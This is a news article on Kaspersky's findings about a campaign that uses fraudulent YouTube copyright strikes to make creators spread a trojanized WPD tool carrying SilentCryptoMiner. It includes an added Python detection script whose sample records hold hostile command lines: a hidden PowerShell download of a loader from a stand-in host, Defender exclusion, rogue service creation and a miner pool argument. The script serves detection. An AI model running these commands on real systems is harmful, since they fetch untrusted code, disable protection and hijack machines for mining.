YouTubers Extorted via Copyright Strikes to Spread SilentCryptoMiner Malware

YouTube Under Attack: How Hackers Use Copyright Strikes to Distribute SilentCryptoMiner

Kaspersky researchers have documented a campaign in which attackers abuse YouTube's copyright enforcement system to turn creators into a distribution channel for SilentCryptoMiner. Fraudulent copyright claims are the lever: a creator is told to add a specific download link to a video description or face further strikes, and that link points at a trojanized build of the very tool the video is about. The scheme damages the creator's credibility and exposes an audience that trusts the channel to malware dressed up as the software they came for.

Copyright strikes are a genuine threat to a creator: three active strikes lead to channel termination. The attackers exploit that fear, using fraudulent claims as leverage to coerce creators into placing links to trojanized software in their video descriptions. Each creator who complies becomes an unwilling node in the malware distribution network, and every viewer who follows the link is a potential victim.

How the Extortion Scheme Works

Kaspersky researchers found that the attackers primarily target YouTubers who publish tutorials on bypassing internet restrictions, in particular tools built on Windows Packet Divert (WPD). WPD is a driver that lets a user-mode program intercept and rewrite network packets, and tools built on it are widely used to get around traffic blocking in regions with strict internet controls, such as Russia. The audience suits the attackers well: these viewers are already looking for an executable to download and run.

Step-by-Step Breakdown of the Attack:

  1. False copyright claims: The attackers impersonate the developers of a WPD-based tool and file copyright claims against the creator's videos. Because three strikes terminate a channel, even a single fraudulent strike is a credible threat.
  2. Extortion: The attackers then contact the creator, present themselves as the tool's rightful developers, and demand that a specific download link be added to the video description in exchange for no further strikes.
  3. Malware distribution: The link leads to a GitHub repository hosting a trojanized copy of the tool bundled with SilentCryptoMiner. Once the victim runs it, the malware uses the machine's processing power to mine cryptocurrency for the attackers.

Impact and Scope of the Attack

The reach of the campaign is considerable. According to Kaspersky's report:

  • One video promoting the trojanized software was viewed more than 400,000 times before the link was taken down.
  • The infected archive was downloaded more than 40,000 times; every download that was run became a mining bot for the attackers.
  • A Telegram channel with 340,000 subscribers also distributed the malware.
  • Kaspersky's telemetry shows at least 2,000 affected users in Russia, and the report notes that the real number is likely much higher.

How SilentCryptoMiner Works

Figure: Kaspersky's summary of the campaign, captioned "They started distributing malware under the guise of restriction bypass programs and injecting malicious code into existing programs." (Image courtesy: Google)

Kaspersky researchers dissected the malware and found a multi-stage infection process built for reliable delivery, evasion and persistence:

  1. Initial download: The victim downloads what looks like a legitimate WPD tool from GitHub. The archive includes a batch start script, general.bat, into which the attackers have inserted their own code.
  2. Execution: The script runs a PowerShell command that fetches and launches a Python-based loader. If antivirus blocks this stage, the user is shown an error message telling them to disable their security software and try again. Any installer that asks for this should be treated as malicious.
  3. Geo-targeting: The loader proceeds only if the victim's public IP address is in Russia, so sandboxes and analysts outside the target region see nothing.
  4. Evasion tactics: The malware checks whether it is running in a virtual machine and aborts if so, disables Windows Defender, and installs itself as a Windows service so that it survives reboots.
  5. Cryptomining: The infected machine then mines Ethereum (ETH), Ethereum Classic (ETC), Monero (XMR) and Raptoreum (RTM), with the proceeds going to wallets controlled by the attackers.
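As an added example, not part of this article or of Kaspersky's report, the Python below runs detection logic for the stages listed above over a handful of constructed process-creation records in the shape of Sysmon Event ID 1. The host names, file paths, URL, service name, wallet and pool address are all made up, and the command-line patterns are the generic forms of these techniques rather than the exact strings used in this campaign, which the article does not reproduce. One detail worth knowing when hunting for this chain: a batch file executes under cmd.exe, so the general.bat stage shows up in telemetry as cmd.exe spawning powershell.exe.

```python
import re
from collections import defaultdict

# Constructed process-creation records in the shape of Sysmon Event ID 1 (fields flattened).
# Hosts, paths, URL, service name, wallet and pool are invented for this example; they are
# not indicators from Kaspersky's report.
EVENTS = [
    # ws01: every stage of the chain the article describes
    {"host": "ws01", "parent": r"C:\Windows\System32\cmd.exe",          # general.bat runs under cmd.exe
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -c "iwr http://dl.example.invalid/loader.py -OutFile $env:TEMP\loader.py"'},
    {"host": "ws01", "parent": r"C:\Users\u\AppData\Local\Temp\python.exe",   # the Python loader at work
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -c "Add-MpPreference -ExclusionPath C:\ProgramData\svc"'},
    {"host": "ws01", "parent": r"C:\Users\u\AppData\Local\Temp\python.exe",
     "image": r"C:\Windows\System32\sc.exe",
     "cmdline": r'sc.exe create WinSvcHelper binPath= "C:\ProgramData\svc\svc.exe" start= auto'},
    {"host": "ws01", "parent": r"C:\Windows\System32\services.exe",          # the service starting = persistence worked
     "image": r"C:\ProgramData\svc\svc.exe",
     "cmdline": r"svc.exe -o stratum+tcp://pool.example.invalid:3333 -u wallet --donate-level=0"},
    # ws02: routine administration that must not fire
    {"host": "ws02", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"'},
    {"host": "ws02", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\sc.exe",
     "cmdline": r"sc.exe query Spooler"},
]

# Generic patterns for each technique (assumptions; matched against the lower-cased command line).
PS_EVASION_FLAGS = re.compile(r"-w\w*\s+hidden|-e\w*\s+bypass|-enc\w*\s")
DOWNLOAD_CRADLE = re.compile(
    r"\b(?:iwr|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|start-bitstransfer|curl|wget)\b")
DEFENDER_TAMPER = re.compile(
    r"add-mppreference\s+-exclusion|set-mppreference\s+-disable|\bsc(?:\.exe)?\s+(?:stop|config)\s+windefend")
SERVICE_CREATE = re.compile(r"\bsc(?:\.exe)?\s+create\b|\bnew-service\b")
USER_WRITABLE = re.compile(r"appdata|programdata|\\temp\\|\\users\\public")   # service binary outside Program Files
MINER_ARGS = re.compile(r"stratum\+(?:tcp|ssl)://|--donate-level|\bxmrig\b")


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the set of chain stages that one process-creation record matches."""
    cmd = event["cmdline"].lower()
    image, parent = basename(event["image"]), basename(event["parent"])
    hits = set()
    is_powershell = image in ("powershell.exe", "pwsh.exe")
    # Stage 2: PowerShell pulling the loader, launched from a batch file or with evasion flags
    if is_powershell and DOWNLOAD_CRADLE.search(cmd) and (PS_EVASION_FLAGS.search(cmd) or parent == "cmd.exe"):
        hits.add("loader_launch")
    # Stage 4: Defender exclusions or shutdown
    if DEFENDER_TAMPER.search(cmd):
        hits.add("defender_tamper")
    # Stage 4: a new service whose binary lives in a user-writable directory
    if SERVICE_CREATE.search(cmd) and USER_WRITABLE.search(cmd):
        hits.add("service_persistence")
    # Stage 5: miner command-line conventions (pool URL, donate level, XMRig)
    if MINER_ARGS.search(cmd):
        hits.add("miner")
    return hits


def correlate(events):
    """Union the stages seen per host: one weak signal is noise, the sequence is not."""
    per_host = defaultdict(set)
    for event in events:
        per_host[event["host"]] |= classify(event)
    return dict(per_host)


def verdict(stages):
    if ("miner" in stages and len(stages) >= 2) or len(stages) >= 3:
        return "high"
    if len(stages) == 2:
        return "medium"
    return "low" if stages else "none"


def triage(events):
    """Map host -> (verdict, sorted stage names)."""
    return {host: (verdict(stages), sorted(stages)) for host, stages in correlate(events).items()}


if __name__ == "__main__":
    for host, (level, stages) in triage(EVENTS).items():
        print(f"{host}: {level:6} {', '.join(stages) or '-'}")
```

The geo-check and the virtual-machine check leave no process-creation trace, so they are not modelled; what the rules catch is the batch-to-PowerShell download, the Defender tampering, the service persistence and the miner's pool argument. Each rule alone would be noisy on an administrator's workstation, which is why the verdict is computed per host over the union of stages rather than per event.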

Historical Context and Platform Exploitation

This attack is part of a larger trend of cybercriminals abusing YouTube’s copyright enforcement system. In 2019, creators reported a surge in fraudulent copyright strikes being used for blackmail. The three-strike policy, originally designed to protect intellectual property, has become a weapon for bad actors.

By combining social engineering, platform manipulation, and malware distribution, this latest attack demonstrates how cybercriminals continually adapt their tactics to exploit digital platforms.

How YouTube Creators Can Protect Themselves

To avoid falling victim to such schemes, YouTube creators should take the following precautions:

  • Verify copyright claims: If a claim looks suspicious, dispute it through YouTube's own process and seek legal advice before doing anything the claimant asks. Do not negotiate with the claimant over e-mail or messaging apps.
  • Be cautious of external links: Never add a link to a video description under pressure. Link only to the project's official release page and, where the project publishes checksums, confirm that the archive you downloaded matches them before you run it or recommend it.
  • Stay updated: Follow cybersecurity communities and other creators in your niche to learn about emerging threats.
  • Strengthen security: Keep antivirus software updated, scan downloads before running them, watch for phishing attempts, and never disable security software because an installer tells you to.

To Sum Up

Kaspersky's findings show how cybercriminals can turn a platform's own enforcement mechanism into a malware distribution channel. The SilentCryptoMiner campaign puts creators and their audiences at risk, and it works because the extortion demand looks like ordinary platform bureaucracy. Creators who understand the scheme, refuse to add links under pressure, and report suspicious claims promptly protect both their channel and the people who watch it.

Author

  • Maya Pillai is a tech writer with 20+ years of experience curating engaging content. She can translate complex ideas into clear, concise information for all audiences.
